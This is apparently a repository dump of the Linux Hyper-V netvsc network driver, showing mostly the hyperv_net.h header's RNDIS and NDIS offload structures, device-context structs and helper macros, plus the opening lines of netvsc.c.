*slots; 679 | u32 first; /* first data entry */ 680 | u32 next; /* next entry for writing */ 681 | }; 682 | 683 | struct netvsc_stats { 684 | u64 packets; 685 | u64 bytes; 686 | u64 broadcast; 687 | u64 multicast; 688 | struct u64_stats_sync syncp; 689 | }; 690 | 691 | struct netvsc_ethtool_stats { 692 | unsigned long tx_scattered; 693 | unsigned long tx_no_memory; 694 | unsigned long tx_no_space; 695 | unsigned long tx_too_big; 696 | unsigned long tx_busy; 697 | unsigned long tx_send_full; 698 | unsigned long rx_comp_busy; 699 | }; 700 | 701 | struct netvsc_vf_pcpu_stats { 702 | u64 rx_packets; 703 | u64 rx_bytes; 704 | u64 tx_packets; 705 | u64 tx_bytes; 706 | struct u64_stats_sync syncp; 707 | u32 tx_dropped; 708 | }; 709 | 710 | struct netvsc_reconfig { 711 | struct list_head list; 712 | u32 event; 713 | }; 714 | 715 | /* The context of the netvsc device */ 716 | struct net_device_context { 717 | /* point back to our device context */ 718 | struct hv_device *device_ctx; 719 | /* netvsc_device */ 720 | struct netvsc_device __rcu *nvdev; 721 | /* reconfigure work */ 722 | struct delayed_work dwork; 723 | /* last reconfig time */ 724 | unsigned long last_reconfig; 725 | /* reconfig events */ 726 | struct list_head reconfig_events; 727 | /* list protection */ 728 | spinlock_t lock; 729 | 730 | u32 msg_enable; /* debug level */ 731 | 732 | u32 tx_checksum_mask; 733 | 734 | u32 tx_send_table[VRSS_SEND_TAB_SIZE]; 735 | 736 | /* Ethtool settings */ 737 | bool udp4_l4_hash; 738 | bool udp6_l4_hash; 739 | u8 duplex; 740 | u32 speed; 741 | struct netvsc_ethtool_stats eth_stats; 742 | 743 | /* State to manage the 
associated VF interface. */ 744 | struct net_device __rcu *vf_netdev; 745 | struct netvsc_vf_pcpu_stats __percpu *vf_stats; 746 | struct delayed_work vf_takeover; 747 | 748 | /* 1: allocated, serial number is valid. 0: not allocated */ 749 | u32 vf_alloc; 750 | /* Serial number of the VF to team with */ 751 | u32 vf_serial; 752 | }; 753 | 754 | /* Per channel data */ 755 | struct netvsc_channel { 756 | struct vmbus_channel *channel; 757 | struct netvsc_device *net_device; 758 | const struct vmpacket_descriptor *desc; 759 | struct napi_struct napi; 760 | struct multi_send_data msd; 761 | struct multi_recv_comp mrc; 762 | atomic_t queue_sends; 763 | 764 | struct netvsc_stats tx_stats; 765 | struct netvsc_stats rx_stats; 766 | }; 767 | 768 | /* Per netvsc device */ 769 | struct netvsc_device { 770 | u32 nvsp_version; 771 | 772 | wait_queue_head_t wait_drain; 773 | bool destroy; 774 | 775 | /* Receive buffer allocated by us but manages by NetVSP */ 776 | void *recv_buf; 777 | u32 recv_buf_gpadl_handle; 778 | u32 recv_section_cnt; 779 | u32 recv_section_size; 780 | u32 recv_completion_cnt; 781 | 782 | /* Send buffer allocated by us */ 783 | void *send_buf; 784 | u32 send_buf_gpadl_handle; 785 | u32 send_section_cnt; 786 | u32 send_section_size; 787 | unsigned long *send_section_map; 788 | 789 | /* Used for NetVSP initialization protocol */ 790 | struct completion channel_init_wait; 791 | struct nvsp_message channel_init_pkt; 792 | 793 | struct nvsp_message revoke_packet; 794 | 795 | u32 max_chn; 796 | u32 num_chn; 797 | 798 | atomic_t open_chn; 799 | struct work_struct subchan_work; 800 | wait_queue_head_t subchan_open; 801 | 802 | struct rndis_device *extension; 803 | 804 | int ring_size; 805 | 806 | u32 max_pkt; /* max number of pkt in one send, e.g. 8 */ 807 | u32 pkt_align; /* alignment bytes, e.g. 8 */ 808 | 809 | atomic_t open_cnt; 810 | 811 | struct netvsc_channel chan_table[VRSS_CHANNEL_MAX]; 812 | 813 | struct rcu_head rcu; 814 | }; 815 | 816 | /* NdisInitialize message */ 817 | struct rndis_initialize_request { 818 | u32 req_id; 819 | u32 major_ver; 820 | u32 minor_ver; 821 | u32 max_xfer_size; 822 | }; 823 | 824 | /* Response to NdisInitialize */ 825 | struct rndis_initialize_complete { 826 | u32 req_id; 827 | u32 status; 828 | u32 major_ver; 829 | u32 minor_ver; 830 | u32 dev_flags; 831 | u32 medium; 832 | u32 max_pkt_per_msg; 833 | u32 max_xfer_size; 834 | u32 pkt_alignment_factor; 835 | u32 af_list_offset; 836 | u32 af_list_size; 837 | }; 838 | 839 | /* Call manager devices only: Information about an address family */ 840 | /* supported by the device is appended to the response to NdisInitialize. 
*/ 841 | struct rndis_co_address_family { 842 | u32 address_family; 843 | u32 major_ver; 844 | u32 minor_ver; 845 | }; 846 | 847 | /* NdisHalt message */ 848 | struct rndis_halt_request { 849 | u32 req_id; 850 | }; 851 | 852 | /* NdisQueryRequest message */ 853 | struct rndis_query_request { 854 | u32 req_id; 855 | u32 oid; 856 | u32 info_buflen; 857 | u32 info_buf_offset; 858 | u32 dev_vc_handle; 859 | }; 860 | 861 | /* Response to NdisQueryRequest */ 862 | struct rndis_query_complete { 863 | u32 req_id; 864 | u32 status; 865 | u32 info_buflen; 866 | u32 info_buf_offset; 867 | }; 868 | 869 | /* NdisSetRequest message */ 870 | struct rndis_set_request { 871 | u32 req_id; 872 | u32 oid; 873 | u32 info_buflen; 874 | u32 info_buf_offset; 875 | u32 dev_vc_handle; 876 | }; 877 | 878 | /* Response to NdisSetRequest */ 879 | struct rndis_set_complete { 880 | u32 req_id; 881 | u32 status; 882 | }; 883 | 884 | /* NdisReset message */ 885 | struct rndis_reset_request { 886 | u32 reserved; 887 | }; 888 | 889 | /* Response to NdisReset */ 890 | struct rndis_reset_complete { 891 | u32 status; 892 | u32 addressing_reset; 893 | }; 894 | 895 | /* NdisMIndicateStatus message */ 896 | struct rndis_indicate_status { 897 | u32 status; 898 | u32 status_buflen; 899 | u32 status_buf_offset; 900 | }; 901 | 902 | /* Diagnostic information passed as the status buffer in */ 903 | /* struct rndis_indicate_status messages signifying error conditions. */ 904 | struct rndis_diagnostic_info { 905 | u32 diag_status; 906 | u32 error_offset; 907 | }; 908 | 909 | /* NdisKeepAlive message */ 910 | struct rndis_keepalive_request { 911 | u32 req_id; 912 | }; 913 | 914 | /* Response to NdisKeepAlive */ 915 | struct rndis_keepalive_complete { 916 | u32 req_id; 917 | u32 status; 918 | }; 919 | 920 | /* 921 | * Data message. All Offset fields contain byte offsets from the beginning of 922 | * struct rndis_packet. All Length fields are in bytes. VcHandle is set 923 | * to 0 for connectionless data, otherwise it contains the VC handle. 924 | */ 925 | struct rndis_packet { 926 | u32 data_offset; 927 | u32 data_len; 928 | u32 oob_data_offset; 929 | u32 oob_data_len; 930 | u32 num_oob_data_elements; 931 | u32 per_pkt_info_offset; 932 | u32 per_pkt_info_len; 933 | u32 vc_handle; 934 | u32 reserved; 935 | }; 936 | 937 | /* Optional Out of Band data associated with a Data message. */ 938 | struct rndis_oobd { 939 | u32 size; 940 | u32 type; 941 | u32 class_info_offset; 942 | }; 943 | 944 | /* Packet extension field contents associated with a Data message. 
*/ 945 | struct rndis_per_packet_info { 946 | u32 size; 947 | u32 type; 948 | u32 ppi_offset; 949 | }; 950 | 951 | enum ndis_per_pkt_info_type { 952 | TCPIP_CHKSUM_PKTINFO, 953 | IPSEC_PKTINFO, 954 | TCP_LARGESEND_PKTINFO, 955 | CLASSIFICATION_HANDLE_PKTINFO, 956 | NDIS_RESERVED, 957 | SG_LIST_PKTINFO, 958 | IEEE_8021Q_INFO, 959 | ORIGINAL_PKTINFO, 960 | PACKET_CANCEL_ID, 961 | NBL_HASH_VALUE = PACKET_CANCEL_ID, 962 | ORIGINAL_NET_BUFLIST, 963 | CACHED_NET_BUFLIST, 964 | SHORT_PKT_PADINFO, 965 | MAX_PER_PKT_INFO 966 | }; 967 | 968 | struct ndis_pkt_8021q_info { 969 | union { 970 | struct { 971 | u32 pri:3; /* User Priority */ 972 | u32 cfi:1; /* Canonical Format ID */ 973 | u32 vlanid:12; /* VLAN ID */ 974 | u32 reserved:16; 975 | }; 976 | u32 value; 977 | }; 978 | }; 979 | 980 | struct ndis_object_header { 981 | u8 type; 982 | u8 revision; 983 | u16 size; 984 | }; 985 | 986 | #define NDIS_OBJECT_TYPE_DEFAULT 0x80 987 | #define NDIS_OFFLOAD_PARAMETERS_REVISION_3 3 988 | #define NDIS_OFFLOAD_PARAMETERS_REVISION_2 2 989 | #define NDIS_OFFLOAD_PARAMETERS_REVISION_1 1 990 | 991 | #define NDIS_OFFLOAD_PARAMETERS_NO_CHANGE 0 992 | #define NDIS_OFFLOAD_PARAMETERS_LSOV2_DISABLED 1 993 | #define NDIS_OFFLOAD_PARAMETERS_LSOV2_ENABLED 2 994 | #define NDIS_OFFLOAD_PARAMETERS_LSOV1_ENABLED 2 995 | #define NDIS_OFFLOAD_PARAMETERS_RSC_DISABLED 1 996 | #define NDIS_OFFLOAD_PARAMETERS_RSC_ENABLED 2 997 | #define NDIS_OFFLOAD_PARAMETERS_TX_RX_DISABLED 1 998 | #define NDIS_OFFLOAD_PARAMETERS_TX_ENABLED_RX_DISABLED 2 999 | #define NDIS_OFFLOAD_PARAMETERS_RX_ENABLED_TX_DISABLED 3 1000 | #define NDIS_OFFLOAD_PARAMETERS_TX_RX_ENABLED 4 1001 | 1002 | #define NDIS_TCP_LARGE_SEND_OFFLOAD_V2_TYPE 1 1003 | #define NDIS_TCP_LARGE_SEND_OFFLOAD_IPV4 0 1004 | #define NDIS_TCP_LARGE_SEND_OFFLOAD_IPV6 1 1005 | 1006 | #define VERSION_4_OFFLOAD_SIZE 22 1007 | /* 1008 | * New offload OIDs for NDIS 6 1009 | */ 1010 | #define OID_TCP_OFFLOAD_CURRENT_CONFIG 0xFC01020B /* query only */ 1011 | #define OID_TCP_OFFLOAD_PARAMETERS 0xFC01020C /* set only */ 1012 | #define OID_TCP_OFFLOAD_HARDWARE_CAPABILITIES 0xFC01020D/* query only */ 1013 | #define OID_TCP_CONNECTION_OFFLOAD_CURRENT_CONFIG 0xFC01020E /* query only */ 1014 | #define OID_TCP_CONNECTION_OFFLOAD_HARDWARE_CAPABILITIES 0xFC01020F /* query */ 1015 | #define OID_OFFLOAD_ENCAPSULATION 0x0101010A /* set/query */ 1016 | 1017 | /* 1018 | * OID_TCP_OFFLOAD_HARDWARE_CAPABILITIES 1019 | * ndis_type: NDIS_OBJTYPE_OFFLOAD 1020 | */ 1021 | 1022 | #define NDIS_OFFLOAD_ENCAP_NONE 0x0000 1023 | #define NDIS_OFFLOAD_ENCAP_NULL 0x0001 1024 | #define NDIS_OFFLOAD_ENCAP_8023 0x0002 1025 | #define NDIS_OFFLOAD_ENCAP_8023PQ 0x0004 1026 | #define NDIS_OFFLOAD_ENCAP_8023PQ_OOB 0x0008 1027 | #define NDIS_OFFLOAD_ENCAP_RFC1483 0x0010 1028 | 1029 | struct ndis_csum_offload { 1030 | u32 ip4_txenc; 1031 | u32 ip4_txcsum; 1032 | #define NDIS_TXCSUM_CAP_IP4OPT 0x001 1033 | #define NDIS_TXCSUM_CAP_TCP4OPT 0x004 1034 | #define NDIS_TXCSUM_CAP_TCP4 0x010 1035 | #define NDIS_TXCSUM_CAP_UDP4 0x040 1036 | #define NDIS_TXCSUM_CAP_IP4 0x100 1037 | 1038 | #define NDIS_TXCSUM_ALL_TCP4 (NDIS_TXCSUM_CAP_TCP4 | NDIS_TXCSUM_CAP_TCP4OPT) 1039 | 1040 | u32 ip4_rxenc; 1041 | u32 ip4_rxcsum; 1042 | #define NDIS_RXCSUM_CAP_IP4OPT 0x001 1043 | #define NDIS_RXCSUM_CAP_TCP4OPT 0x004 1044 | #define NDIS_RXCSUM_CAP_TCP4 0x010 1045 | #define NDIS_RXCSUM_CAP_UDP4 0x040 1046 | #define NDIS_RXCSUM_CAP_IP4 0x100 1047 | u32 ip6_txenc; 1048 | u32 ip6_txcsum; 1049 | #define NDIS_TXCSUM_CAP_IP6EXT 0x001 1050 | #define 
NDIS_TXCSUM_CAP_TCP6OPT 0x004 1051 | #define NDIS_TXCSUM_CAP_TCP6 0x010 1052 | #define NDIS_TXCSUM_CAP_UDP6 0x040 1053 | u32 ip6_rxenc; 1054 | u32 ip6_rxcsum; 1055 | #define NDIS_RXCSUM_CAP_IP6EXT 0x001 1056 | #define NDIS_RXCSUM_CAP_TCP6OPT 0x004 1057 | #define NDIS_RXCSUM_CAP_TCP6 0x010 1058 | #define NDIS_RXCSUM_CAP_UDP6 0x040 1059 | 1060 | #define NDIS_TXCSUM_ALL_TCP6 (NDIS_TXCSUM_CAP_TCP6 | \ 1061 | NDIS_TXCSUM_CAP_TCP6OPT | \ 1062 | NDIS_TXCSUM_CAP_IP6EXT) 1063 | }; 1064 | 1065 | struct ndis_lsov1_offload { 1066 | u32 encap; 1067 | u32 maxsize; 1068 | u32 minsegs; 1069 | u32 opts; 1070 | }; 1071 | 1072 | struct ndis_ipsecv1_offload { 1073 | u32 encap; 1074 | u32 ah_esp; 1075 | u32 xport_tun; 1076 | u32 ip4_opts; 1077 | u32 flags; 1078 | u32 ip4_ah; 1079 | u32 ip4_esp; 1080 | }; 1081 | 1082 | struct ndis_lsov2_offload { 1083 | u32 ip4_encap; 1084 | u32 ip4_maxsz; 1085 | u32 ip4_minsg; 1086 | u32 ip6_encap; 1087 | u32 ip6_maxsz; 1088 | u32 ip6_minsg; 1089 | u32 ip6_opts; 1090 | #define NDIS_LSOV2_CAP_IP6EXT 0x001 1091 | #define NDIS_LSOV2_CAP_TCP6OPT 0x004 1092 | 1093 | #define NDIS_LSOV2_CAP_IP6 (NDIS_LSOV2_CAP_IP6EXT | \ 1094 | NDIS_LSOV2_CAP_TCP6OPT) 1095 | }; 1096 | 1097 | struct ndis_ipsecv2_offload { 1098 | u32 encap; 1099 | u16 ip6; 1100 | u16 ip4opt; 1101 | u16 ip6ext; 1102 | u16 ah; 1103 | u16 esp; 1104 | u16 ah_esp; 1105 | u16 xport; 1106 | u16 tun; 1107 | u16 xport_tun; 1108 | u16 lso; 1109 | u16 extseq; 1110 | u32 udp_esp; 1111 | u32 auth; 1112 | u32 crypto; 1113 | u32 sa_caps; 1114 | }; 1115 | 1116 | struct ndis_rsc_offload { 1117 | u16 ip4; 1118 | u16 ip6; 1119 | }; 1120 | 1121 | struct ndis_encap_offload { 1122 | u32 flags; 1123 | u32 maxhdr; 1124 | }; 1125 | 1126 | struct ndis_offload { 1127 | struct ndis_object_header header; 1128 | struct ndis_csum_offload csum; 1129 | struct ndis_lsov1_offload lsov1; 1130 | struct ndis_ipsecv1_offload ipsecv1; 1131 | struct ndis_lsov2_offload lsov2; 1132 | u32 flags; 1133 | /* NDIS >= 6.1 */ 1134 | struct ndis_ipsecv2_offload ipsecv2; 1135 | /* NDIS >= 6.30 */ 1136 | struct ndis_rsc_offload rsc; 1137 | struct ndis_encap_offload encap_gre; 1138 | }; 1139 | 1140 | #define NDIS_OFFLOAD_SIZE sizeof(struct ndis_offload) 1141 | #define NDIS_OFFLOAD_SIZE_6_0 offsetof(struct ndis_offload, ipsecv2) 1142 | #define NDIS_OFFLOAD_SIZE_6_1 offsetof(struct ndis_offload, rsc) 1143 | 1144 | struct ndis_offload_params { 1145 | struct ndis_object_header header; 1146 | u8 ip_v4_csum; 1147 | u8 tcp_ip_v4_csum; 1148 | u8 udp_ip_v4_csum; 1149 | u8 tcp_ip_v6_csum; 1150 | u8 udp_ip_v6_csum; 1151 | u8 lso_v1; 1152 | u8 ip_sec_v1; 1153 | u8 lso_v2_ipv4; 1154 | u8 lso_v2_ipv6; 1155 | u8 tcp_connection_ip_v4; 1156 | u8 tcp_connection_ip_v6; 1157 | u32 flags; 1158 | u8 ip_sec_v2; 1159 | u8 ip_sec_v2_ip_v4; 1160 | struct { 1161 | u8 rsc_ip_v4; 1162 | u8 rsc_ip_v6; 1163 | }; 1164 | struct { 1165 | u8 encapsulated_packet_task_offload; 1166 | u8 encapsulation_types; 1167 | }; 1168 | }; 1169 | 1170 | struct ndis_tcp_ip_checksum_info { 1171 | union { 1172 | struct { 1173 | u32 is_ipv4:1; 1174 | u32 is_ipv6:1; 1175 | u32 tcp_checksum:1; 1176 | u32 udp_checksum:1; 1177 | u32 ip_header_checksum:1; 1178 | u32 reserved:11; 1179 | u32 tcp_header_offset:10; 1180 | } transmit; 1181 | struct { 1182 | u32 tcp_checksum_failed:1; 1183 | u32 udp_checksum_failed:1; 1184 | u32 ip_checksum_failed:1; 1185 | u32 tcp_checksum_succeeded:1; 1186 | u32 udp_checksum_succeeded:1; 1187 | u32 ip_checksum_succeeded:1; 1188 | u32 loopback:1; 1189 | u32 tcp_checksum_value_invalid:1; 1190 | u32 
ip_checksum_value_invalid:1; 1191 | } receive; 1192 | u32 value; 1193 | }; 1194 | }; 1195 | 1196 | struct ndis_tcp_lso_info { 1197 | union { 1198 | struct { 1199 | u32 unused:30; 1200 | u32 type:1; 1201 | u32 reserved2:1; 1202 | } transmit; 1203 | struct { 1204 | u32 mss:20; 1205 | u32 tcp_header_offset:10; 1206 | u32 type:1; 1207 | u32 reserved2:1; 1208 | } lso_v1_transmit; 1209 | struct { 1210 | u32 tcp_payload:30; 1211 | u32 type:1; 1212 | u32 reserved2:1; 1213 | } lso_v1_transmit_complete; 1214 | struct { 1215 | u32 mss:20; 1216 | u32 tcp_header_offset:10; 1217 | u32 type:1; 1218 | u32 ip_version:1; 1219 | } lso_v2_transmit; 1220 | struct { 1221 | u32 reserved:30; 1222 | u32 type:1; 1223 | u32 reserved2:1; 1224 | } lso_v2_transmit_complete; 1225 | u32 value; 1226 | }; 1227 | }; 1228 | 1229 | #define NDIS_VLAN_PPI_SIZE (sizeof(struct rndis_per_packet_info) + \ 1230 | sizeof(struct ndis_pkt_8021q_info)) 1231 | 1232 | #define NDIS_CSUM_PPI_SIZE (sizeof(struct rndis_per_packet_info) + \ 1233 | sizeof(struct ndis_tcp_ip_checksum_info)) 1234 | 1235 | #define NDIS_LSO_PPI_SIZE (sizeof(struct rndis_per_packet_info) + \ 1236 | sizeof(struct ndis_tcp_lso_info)) 1237 | 1238 | #define NDIS_HASH_PPI_SIZE (sizeof(struct rndis_per_packet_info) + \ 1239 | sizeof(u32)) 1240 | 1241 | /* Total size of all PPI data */ 1242 | #define NDIS_ALL_PPI_SIZE (NDIS_VLAN_PPI_SIZE + NDIS_CSUM_PPI_SIZE + \ 1243 | NDIS_LSO_PPI_SIZE + NDIS_HASH_PPI_SIZE) 1244 | 1245 | /* Format of Information buffer passed in a SetRequest for the OID */ 1246 | /* OID_GEN_RNDIS_CONFIG_PARAMETER. */ 1247 | struct rndis_config_parameter_info { 1248 | u32 parameter_name_offset; 1249 | u32 parameter_name_length; 1250 | u32 parameter_type; 1251 | u32 parameter_value_offset; 1252 | u32 parameter_value_length; 1253 | }; 1254 | 1255 | /* Values for ParameterType in struct rndis_config_parameter_info */ 1256 | #define RNDIS_CONFIG_PARAM_TYPE_INTEGER 0 1257 | #define RNDIS_CONFIG_PARAM_TYPE_STRING 2 1258 | 1259 | /* CONDIS Miniport messages for connection oriented devices */ 1260 | /* that do not implement a call manager. 
*/ 1261 | 1262 | /* CoNdisMiniportCreateVc message */ 1263 | struct rcondis_mp_create_vc { 1264 | u32 req_id; 1265 | u32 ndis_vc_handle; 1266 | }; 1267 | 1268 | /* Response to CoNdisMiniportCreateVc */ 1269 | struct rcondis_mp_create_vc_complete { 1270 | u32 req_id; 1271 | u32 dev_vc_handle; 1272 | u32 status; 1273 | }; 1274 | 1275 | /* CoNdisMiniportDeleteVc message */ 1276 | struct rcondis_mp_delete_vc { 1277 | u32 req_id; 1278 | u32 dev_vc_handle; 1279 | }; 1280 | 1281 | /* Response to CoNdisMiniportDeleteVc */ 1282 | struct rcondis_mp_delete_vc_complete { 1283 | u32 req_id; 1284 | u32 status; 1285 | }; 1286 | 1287 | /* CoNdisMiniportQueryRequest message */ 1288 | struct rcondis_mp_query_request { 1289 | u32 req_id; 1290 | u32 request_type; 1291 | u32 oid; 1292 | u32 dev_vc_handle; 1293 | u32 info_buflen; 1294 | u32 info_buf_offset; 1295 | }; 1296 | 1297 | /* CoNdisMiniportSetRequest message */ 1298 | struct rcondis_mp_set_request { 1299 | u32 req_id; 1300 | u32 request_type; 1301 | u32 oid; 1302 | u32 dev_vc_handle; 1303 | u32 info_buflen; 1304 | u32 info_buf_offset; 1305 | }; 1306 | 1307 | /* CoNdisIndicateStatus message */ 1308 | struct rcondis_indicate_status { 1309 | u32 ndis_vc_handle; 1310 | u32 status; 1311 | u32 status_buflen; 1312 | u32 status_buf_offset; 1313 | }; 1314 | 1315 | /* CONDIS Call/VC parameters */ 1316 | struct rcondis_specific_parameters { 1317 | u32 parameter_type; 1318 | u32 parameter_length; 1319 | u32 parameter_lffset; 1320 | }; 1321 | 1322 | struct rcondis_media_parameters { 1323 | u32 flags; 1324 | u32 reserved1; 1325 | u32 reserved2; 1326 | struct rcondis_specific_parameters media_specific; 1327 | }; 1328 | 1329 | struct rndis_flowspec { 1330 | u32 token_rate; 1331 | u32 token_bucket_size; 1332 | u32 peak_bandwidth; 1333 | u32 latency; 1334 | u32 delay_variation; 1335 | u32 service_type; 1336 | u32 max_sdu_size; 1337 | u32 minimum_policed_size; 1338 | }; 1339 | 1340 | struct rcondis_call_manager_parameters { 1341 | struct rndis_flowspec transmit; 1342 | struct rndis_flowspec receive; 1343 | struct rcondis_specific_parameters call_mgr_specific; 1344 | }; 1345 | 1346 | /* CoNdisMiniportActivateVc message */ 1347 | struct rcondis_mp_activate_vc_request { 1348 | u32 req_id; 1349 | u32 flags; 1350 | u32 dev_vc_handle; 1351 | u32 media_params_offset; 1352 | u32 media_params_length; 1353 | u32 call_mgr_params_offset; 1354 | u32 call_mgr_params_length; 1355 | }; 1356 | 1357 | /* Response to CoNdisMiniportActivateVc */ 1358 | struct rcondis_mp_activate_vc_complete { 1359 | u32 req_id; 1360 | u32 status; 1361 | }; 1362 | 1363 | /* CoNdisMiniportDeactivateVc message */ 1364 | struct rcondis_mp_deactivate_vc_request { 1365 | u32 req_id; 1366 | u32 flags; 1367 | u32 dev_vc_handle; 1368 | }; 1369 | 1370 | /* Response to CoNdisMiniportDeactivateVc */ 1371 | struct rcondis_mp_deactivate_vc_complete { 1372 | u32 req_id; 1373 | u32 status; 1374 | }; 1375 | 1376 | 1377 | /* union with all of the RNDIS messages */ 1378 | union rndis_message_container { 1379 | struct rndis_packet pkt; 1380 | struct rndis_initialize_request init_req; 1381 | struct rndis_halt_request halt_req; 1382 | struct rndis_query_request query_req; 1383 | struct rndis_set_request set_req; 1384 | struct rndis_reset_request reset_req; 1385 | struct rndis_keepalive_request keep_alive_req; 1386 | struct rndis_indicate_status indicate_status; 1387 | struct rndis_initialize_complete init_complete; 1388 | struct rndis_query_complete query_complete; 1389 | struct rndis_set_complete set_complete; 1390 | struct 
rndis_reset_complete reset_complete; 1391 | struct rndis_keepalive_complete keep_alive_complete; 1392 | struct rcondis_mp_create_vc co_miniport_create_vc; 1393 | struct rcondis_mp_delete_vc co_miniport_delete_vc; 1394 | struct rcondis_indicate_status co_indicate_status; 1395 | struct rcondis_mp_activate_vc_request co_miniport_activate_vc; 1396 | struct rcondis_mp_deactivate_vc_request co_miniport_deactivate_vc; 1397 | struct rcondis_mp_create_vc_complete co_miniport_create_vc_complete; 1398 | struct rcondis_mp_delete_vc_complete co_miniport_delete_vc_complete; 1399 | struct rcondis_mp_activate_vc_complete co_miniport_activate_vc_complete; 1400 | struct rcondis_mp_deactivate_vc_complete 1401 | co_miniport_deactivate_vc_complete; 1402 | }; 1403 | 1404 | /* Remote NDIS message format */ 1405 | struct rndis_message { 1406 | u32 ndis_msg_type; 1407 | 1408 | /* Total length of this message, from the beginning */ 1409 | /* of the struct rndis_message, in bytes. */ 1410 | u32 msg_len; 1411 | 1412 | /* Actual message */ 1413 | union rndis_message_container msg; 1414 | }; 1415 | 1416 | 1417 | /* Handy macros */ 1418 | 1419 | /* get the size of an RNDIS message. Pass in the message type, */ 1420 | /* struct rndis_set_request, struct rndis_packet for example */ 1421 | #define RNDIS_MESSAGE_SIZE(msg) \ 1422 | (sizeof(msg) + (sizeof(struct rndis_message) - \ 1423 | sizeof(union rndis_message_container))) 1424 | 1425 | /* get pointer to info buffer with message pointer */ 1426 | #define MESSAGE_TO_INFO_BUFFER(msg) \ 1427 | (((unsigned char *)(msg)) + msg->info_buf_offset) 1428 | 1429 | /* get pointer to status buffer with message pointer */ 1430 | #define MESSAGE_TO_STATUS_BUFFER(msg) \ 1431 | (((unsigned char *)(msg)) + msg->status_buf_offset) 1432 | 1433 | /* get pointer to OOBD buffer with message pointer */ 1434 | #define MESSAGE_TO_OOBD_BUFFER(msg) \ 1435 | (((unsigned char *)(msg)) + msg->oob_data_offset) 1436 | 1437 | /* get pointer to data buffer with message pointer */ 1438 | #define MESSAGE_TO_DATA_BUFFER(msg) \ 1439 | (((unsigned char *)(msg)) + msg->per_pkt_info_offset) 1440 | 1441 | /* get pointer to contained message from NDIS_MESSAGE pointer */ 1442 | #define RNDIS_MESSAGE_PTR_TO_MESSAGE_PTR(rndis_msg) \ 1443 | ((void *) &rndis_msg->msg) 1444 | 1445 | /* get pointer to contained message from NDIS_MESSAGE pointer */ 1446 | #define RNDIS_MESSAGE_RAW_PTR_TO_MESSAGE_PTR(rndis_msg) \ 1447 | ((void *) rndis_msg) 1448 | 1449 | 1450 | 1451 | #define RNDIS_HEADER_SIZE (sizeof(struct rndis_message) - \ 1452 | sizeof(union rndis_message_container)) 1453 | 1454 | #define RNDIS_AND_PPI_SIZE (sizeof(struct rndis_message) + NDIS_ALL_PPI_SIZE) 1455 | 1456 | #define NDIS_PACKET_TYPE_DIRECTED 0x00000001 1457 | #define NDIS_PACKET_TYPE_MULTICAST 0x00000002 1458 | #define NDIS_PACKET_TYPE_ALL_MULTICAST 0x00000004 1459 | #define NDIS_PACKET_TYPE_BROADCAST 0x00000008 1460 | #define NDIS_PACKET_TYPE_SOURCE_ROUTING 0x00000010 1461 | #define NDIS_PACKET_TYPE_PROMISCUOUS 0x00000020 1462 | #define NDIS_PACKET_TYPE_SMT 0x00000040 1463 | #define NDIS_PACKET_TYPE_ALL_LOCAL 0x00000080 1464 | #define NDIS_PACKET_TYPE_GROUP 0x00000100 1465 | #define NDIS_PACKET_TYPE_ALL_FUNCTIONAL 0x00000200 1466 | #define NDIS_PACKET_TYPE_FUNCTIONAL 0x00000400 1467 | #define NDIS_PACKET_TYPE_MAC_FRAME 0x00000800 1468 | 1469 | #define TRANSPORT_INFO_NOT_IP 0 1470 | #define TRANSPORT_INFO_IPV4_TCP 0x01 1471 | #define TRANSPORT_INFO_IPV4_UDP 0x02 1472 | #define TRANSPORT_INFO_IPV6_TCP 0x10 1473 | #define TRANSPORT_INFO_IPV6_UDP 0x20 1474 | 
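/*
 * Illustration (not in the upstream header): how the size and offset
 * macros above fit together when building a request, in the style of
 * get_rndis_request() in rndis_filter.c. The function name below is
 * invented for this sketch; req_id assignment is left to the caller.
 */
static inline void example_fill_query(struct rndis_message *msg, u32 oid)
{
	struct rndis_query_request *query = &msg->msg.query_req;

	msg->ndis_msg_type = RNDIS_MSG_QUERY;	/* from <linux/rndis.h> */
	/* header size plus this particular body, not the whole union */
	msg->msg_len = RNDIS_MESSAGE_SIZE(struct rndis_query_request);

	query->oid = oid;
	query->info_buflen = 0;
	/* the info buffer starts right after the query body, so
	 * MESSAGE_TO_INFO_BUFFER(query) lands just past the struct */
	query->info_buf_offset = sizeof(struct rndis_query_request);
	query->dev_vc_handle = 0;
}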
1475 | long netvsc_ioctl(struct file *filp,
1476 | 		  unsigned int cmd,
1477 | 		  unsigned long arg);
1478 | 
1479 | #define RNDIS_EXT_LEN PAGE_SIZE
1480 | 
1481 | 
1482 | struct rndis_request {
1483 | 	struct list_head list_ent;
1484 | 	struct completion wait_event;
1485 | 
1486 | 	struct rndis_message response_msg;
1487 | 	/*
1488 | 	 * The buffer for extended info after the RNDIS response message. It's
1489 | 	 * referenced based on the data offset in the RNDIS message. Its size
1490 | 	 * is enough for current needs, and should be sufficient for the near
1491 | 	 * future.
1492 | 	 */
1493 | 	u8 response_ext[RNDIS_EXT_LEN];
1494 | 
1495 | 	/* Simplify allocation by having a netvsc packet inline */
1496 | 	struct hv_netvsc_packet pkt;
1497 | 
1498 | 	struct rndis_message request_msg;
1499 | 	/*
1500 | 	 * The buffer for the extended info after the RNDIS request message.
1501 | 	 * It is referenced and sized in a similar way as response_ext.
1502 | 	 */
1503 | 	u8 request_ext[RNDIS_EXT_LEN];
1504 | };
1505 | 
1506 | #endif /* _HYPERV_NET_H */
1507 | 
--------------------------------------------------------------------------------
/ring0/hyperv/modules.order:
--------------------------------------------------------------------------------
1 | kernel/drivers/net/hyperv/hv_netvsc.ko
2 | 
--------------------------------------------------------------------------------
/ring0/hyperv/netvsc.c:
--------------------------------------------------------------------------------
1 | /*
2 |  * Copyright (c) 2009, Microsoft Corporation.
3 |  *
4 |  * This program is free software; you can redistribute it and/or modify it
5 |  * under the terms and conditions of the GNU General Public License,
6 |  * version 2, as published by the Free Software Foundation.
7 |  *
8 |  * This program is distributed in the hope it will be useful, but WITHOUT
9 |  * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
10 |  * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
11 |  * more details.
12 |  *
13 |  * You should have received a copy of the GNU General Public License along with
14 |  * this program; if not, see <http://www.gnu.org/licenses/>.
15 |  *
16 |  * Authors:
17 |  *   Haiyang Zhang <haiyangz@microsoft.com>
18 |  *   Hank Janssen  <hjanssen@microsoft.com>
19 |  */
20 | #define pr_fmt(fmt) KBUILD_MODNAME ": " fmt
21 | 
22 | #include <linux/kernel.h>
23 | #include <linux/sched.h>
24 | #include <linux/wait.h>
25 | #include <linux/mm.h>
26 | #include <linux/delay.h>
27 | #include <linux/io.h>
